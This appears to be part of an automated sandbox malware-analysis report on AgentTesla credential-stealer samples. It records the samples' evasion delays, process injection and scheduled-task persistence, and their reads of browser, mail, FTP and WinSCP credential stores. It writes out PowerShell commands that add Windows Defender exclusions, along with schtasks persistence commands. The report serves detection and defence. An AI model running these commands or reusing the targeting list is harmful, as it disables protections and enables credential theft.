                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrThread delayed: delay time: 1200000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeThread delayed: delay time: 1200000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2097Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5178Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1585Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4162Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrWindow / User API: threadDelayed 1458
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrWindow / User API: threadDelayed 8392
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2820
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3607
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1548
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2166
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeWindow / User API: threadDelayed 9449
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeWindow / User API: threadDelayed 401
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1912Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr TID: 3416Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr TID: 3148Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3408Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3428Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3244Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3436Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3444Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3328Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\taskeng.exe TID: 3484Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe TID: 3836Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe TID: 3520Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr TID: 3588Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr TID: 3944Thread sleep time: -24903104499507879s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr TID: 3944Thread sleep time: -1200000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr TID: 3972Thread sleep count: 1458 > 30
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr TID: 3972Thread sleep count: 8392 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3712Thread sleep count: 2820 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3720Thread sleep count: 3607 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4004Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4052Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3800Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3884Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3908Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3784Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe TID: 4048Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe TID: 3108Thread sleep time: -17524406870024063s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe TID: 3108Thread sleep time: -7200000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe TID: 1640Thread sleep count: 9449 > 30
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe TID: 1640Thread sleep count: 401 > 30
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2436Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrThread delayed: delay time: 1200000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeThread delayed: delay time: 1200000
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr"
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrMemory written: C:\Users\user\AppData\Roaming\obimohohj75.scr base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeMemory written: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe base: 400000 value starts with: 4D5A
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obimohohj75.scr "C:\Users\user\AppData\Roaming\obimohohj75.scr"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Users\user\AppData\Roaming\obimohohj75.scr "C:\Users\user\AppData\Roaming\obimohohj75.scr"Jump to behavior
                    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp8CF4.tmp"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeProcess created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrQueries volume information: C:\Users\user\AppData\Roaming\obimohohj75.scr VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeQueries volume information: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrQueries volume information: C:\Users\user\AppData\Roaming\obimohohj75.scr VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeQueries volume information: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe VolumeInformation
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 5.2.obimohohj75.scr.35e1930.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.obimohohj75.scr.361c350.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.obimohohj75.scr.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.obimohohj75.scr.361c350.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: obimohohj75.scr PID: 3128, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: obimohohj75.scr PID: 3512, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 5.2.obimohohj75.scr.35e1930.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.obimohohj75.scr.361c350.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.obimohohj75.scr.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.obimohohj75.scr.361c350.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.627290510.00000000022A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
